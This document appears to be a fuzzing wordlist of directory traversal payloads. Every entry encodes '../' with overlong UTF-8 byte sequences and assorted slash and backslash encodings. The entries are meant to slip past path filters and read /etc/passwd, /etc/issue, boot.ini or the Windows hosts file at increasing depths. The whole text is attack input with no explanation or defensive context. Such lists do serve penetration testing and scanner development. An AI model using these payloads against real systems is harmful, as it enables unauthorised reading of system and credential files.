-%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/windows/system32/drivers/etc/hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/windows/system32/drivers/etc/hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/windows/system32/drivers/etc/hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/windows/system32/drivers/etc/hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/windows/system32/drivers/etc/hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/etc/issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/%fc%80%80%80%80%ae%fc%80%80%80%80%ae/windows/system32/drivers/etc/hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\windows\system32\drivers\etc\hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\windows\system32\drivers\etc\hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\windows\system32\drivers\etc\hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\windows\system32\drivers\etc\hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\windows\system32\drivers\etc\hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\etc\issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\windows\system32\drivers\etc\hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fetc%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cpasswd 